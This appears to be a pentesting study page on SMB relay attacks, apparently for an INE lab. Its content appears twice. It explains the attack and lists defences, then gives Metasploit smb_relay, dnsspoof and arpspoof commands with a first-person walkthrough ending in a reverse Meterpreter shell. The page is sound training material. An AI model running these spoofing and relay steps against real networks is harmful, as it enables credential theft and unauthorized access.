SMB Relay Attack

An SMB Relay Attack is a man-in-the-middle (MITM) attack where an attacker intercepts and manipulates SMB (Server Message Block) traffic to gain unauthorized access to network resources. This attack is common in Windows networks, where SMB is used for file sharing, printer sharing, and communication between network devices.

How It Works

Interception (MITM) – The attacker positions themselves between the client and the server, capturing SMB traffic.
Capturing Authentication (NTLM Hash) – The attacker captures the NTLM authentication challenge-response mechanism.
Relaying to a Legitimate Server – The stolen credentials are forwarded to another server where SMB authentication is accepted.
Gaining Access – If the credentials are valid, the attacker can access files, execute commands, or move laterally within the network.

Use SMB Signing to prevent unauthorized message tampering.

Enforce NTLMv2 authentication for better security.

Disable SMBv1 as it lacks security features.

Implement network segmentation to limit attack impact.

Attack

msfconsole
search smb_relay
use exploit/windows/smb/smb_relay
# SRVHOST & LHOST -- my IP; SMBHOST -- target IP; set them in metasploit
exploit

# dns spoofing
echo '[SYSTEM IP] *.domain' > dns
dnsspoof -i eth1 -f dns

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t [CLIENT IP] [GATEWAY]
arpspoof -i eth1 -t [GATEWAY] [CLIENT IP]

In this attack, I’m setting up an SMB Relay Attack combined with DNS spoofing and ARP spoofing to intercept and manipulate network traffic.

First, I launch Metasploit and search for the smb_relay exploit. After selecting it, I set my machine’s IP as SRVHOST and LHOST, while SMBHOST is the target’s IP. Once I run the exploit, it listens for SMB authentication requests and relays them to gain unauthorized access.

Next, I configure DNS spoofing by creating a spoofed DNS entry and running dnsspoof. This forces any requests to specific domains to resolve to my malicious system, making victims unknowingly connect to my machine instead of the legitimate server.

To take full control of the network traffic, I enable ARP spoofing using arpspoof. By poisoning the ARP cache of both the victim and the gateway, I position myself as a man-in-the-middle (MITM), intercepting and modifying SMB traffic. This setup allows me to capture credentials, manipulate network connections, and potentially gain unauthorized access to sensitive resources.

Setting Up the Attack – I use Metasploit to launch an SMB Relay Attack, where I wait for a victim to try logging into an SMB server.
DNS Spoofing – I trick the victim’s computer into thinking my machine is the real destination by redirecting certain domain requests to my system.
ARP Spoofing – I make myself the middleman between the victim and the network gateway, allowing me to intercept and manipulate their network traffic.
Exploiting SMB – When the victim tries to authenticate via SMB, I capture their credentials and relay them to gain unauthorized access.

Task INE

Client (Windows 7) issues a SMB connection to [\\fileserver.sportsfoo.com\finance$] at every 30 seconds or so.
The attacker machine intercepts this request and spoofs the IP address of fileserver.sportsfoo.com.
Then the Windows 7 system issues a SMB connection to [\\172.16.5.101] (attacker machine) instead of using the real IP of the fileserver.sportsfoo.com.
The SMB Relay exploit is already listening, receives the SMB connection, and relays the authentication to the target machine. The payload is a Windows Meterpreter shell.
Once the exploit authenticates on the target machine, a reverse meterpreter session is provided to the pentester.

PreviousPivoting NextWeb Application Pentesting

Last updated 4 months ago

How It Works

Interception (MITM) – The attacker positions themselves between the client and the server, capturing SMB traffic.

Capturing Authentication (NTLM Hash) – The attacker captures the NTLM authentication challenge-response mechanism.

Relaying to a Legitimate Server – The stolen credentials are forwarded to another server where SMB authentication is accepted.

Gaining Access – If the credentials are valid, the attacker can access files, execute commands, or move laterally within the network.

Use SMB Signing to prevent unauthorized message tampering.

Enforce NTLMv2 authentication for better security.

Disable SMBv1 as it lacks security features.

Implement network segmentation to limit attack impact.

Attack

msfconsole
search smb_relay
use exploit/windows/smb/smb_relay
# SRVHOST & LHOST -- my IP; SMBHOST -- target IP; set them in metasploit
exploit

# dns spoofing
echo '[SYSTEM IP] *.domain' > dns
dnsspoof -i eth1 -f dns

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t [CLIENT IP] [GATEWAY]
arpspoof -i eth1 -t [GATEWAY] [CLIENT IP]

In this attack, I’m setting up an SMB Relay Attack combined with DNS spoofing and ARP spoofing to intercept and manipulate network traffic.

Setting Up the Attack – I use Metasploit to launch an SMB Relay Attack, where I wait for a victim to try logging into an SMB server.

DNS Spoofing – I trick the victim’s computer into thinking my machine is the real destination by redirecting certain domain requests to my system.

ARP Spoofing – I make myself the middleman between the victim and the network gateway, allowing me to intercept and manipulate their network traffic.

Exploiting SMB – When the victim tries to authenticate via SMB, I capture their credentials and relay them to gain unauthorized access.

Task INE

Client (Windows 7) issues a SMB connection to [\\fileserver.sportsfoo.com\finance$] at every 30 seconds or so.

The attacker machine intercepts this request and spoofs the IP address of fileserver.sportsfoo.com.

Then the Windows 7 system issues a SMB connection to [\\172.16.5.101] (attacker machine) instead of using the real IP of the fileserver.sportsfoo.com.

The SMB Relay exploit is already listening, receives the SMB connection, and relays the authentication to the target machine. The payload is a Windows Meterpreter shell.

Once the exploit authenticates on the target machine, a reverse meterpreter session is provided to the pentester.